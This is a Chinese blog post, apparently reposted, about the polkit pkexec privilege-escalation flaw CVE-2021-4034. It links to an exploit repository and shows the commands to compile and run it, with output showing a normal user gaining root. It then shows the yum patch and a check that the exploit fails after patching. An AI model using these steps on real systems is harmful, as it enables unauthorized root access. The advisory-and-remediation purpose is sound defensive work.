漏洞概述
漏洞编号:CVE-2021-4034
漏洞威胁等级:高危
Qualys研究团队在polkit的pkexec中发现了一个内存损坏漏洞,该SUID根程序默认安装在每个主要的Linux发行版上。这个漏洞极易被利用,允许任何未经授权的用户通过其默认配置来获取易受攻击主机上的完全root权限。
影响范围:这个漏洞已经潜伏了13年多,自2009年5月以来的所有pkexec版本均受影响。由于Polkit是系统预装工具,目前主流的Linux版本均受影响。Linux系统广泛应用于工业基础设施、云计算、物联网、人工智能等领域,绝大多数关键基础设施管理服务器均使用Linux系统。
目前受影响的重要Linux发行版本:
代码语言:shell
Ubuntu 21.10 (Impish Indri)
复现环境代码语言:shell
]# uname -r3.10.0-862.el7.x86_64]# cat /etc/redhat-releaseCentOS Linux release 7.5.1804 (Core)
普通用户代码语言:shell
# 获取exp文件:获取`exploit.c`地址:https://gitee.com/lutixiaya/cve-2021-4034.git[lutixia@localhost ~]$ lsevil-so.c exploit.c Makefile[lutixia@localhost ~]$ iduid=1001(lutixia) gid=1001(lutixia) groups=1001(lutixia)

美间AI
美间AI:让设计更简单
45 查看详情
编译exp,提权为root代码语言:shell
[lutixia@localhost ~]$ makegcc -shared -o evil.so -fPIC evil-so.cgcc exploit.c -o exploit[lutixia@localhost ~]$ lsevil.so evil-so.c exploit exploit.c Makefile[lutixia@localhost ~]$ ./exploit[root@localhost lutixia]# iduid=0(root) gid=0(root) groups=0(root) context=unconfined_u

修复代码语言:shell
# 查看可用版本[root@localhost ~]# yum list polkitLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfileInstalled Packagespolkit.x86_64 0.112-14.el7 @anacondaAvailable Packagespolkit.i686 0.112-26.el7_9.1 updatespolkit.x86_64 0.112-26.el7_9.1 updates# 升级~]# yum update polkit -y
验证修复代码语言:shell
[lutixia@localhost ~]$ lsevil.so evil-so.c exploit exploit.c Makefile# 再次执行exp文件,提权失败![lutixia@localhost ~]$ ./exploitpkexec --version | --help | --disable-internal-agent | [--user username] PROGRAM [ARGUMENTS...]See the pkexec manual page for more details.Report bugs to: http://lists.freedesktop.org/mailman/listinfo/polkit-develpolkit home page:

赶快检查你的服务器是否暴露在危险之中,立即进行修复吧!
如果你喜欢这篇文章,请帮忙点赞,你的支持是我创作的动力!
以上就是惊爆!!!一条命令,瞬间让普通用户提权为root,赶紧修复!的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/473475.html
微信扫一扫
支付宝扫一扫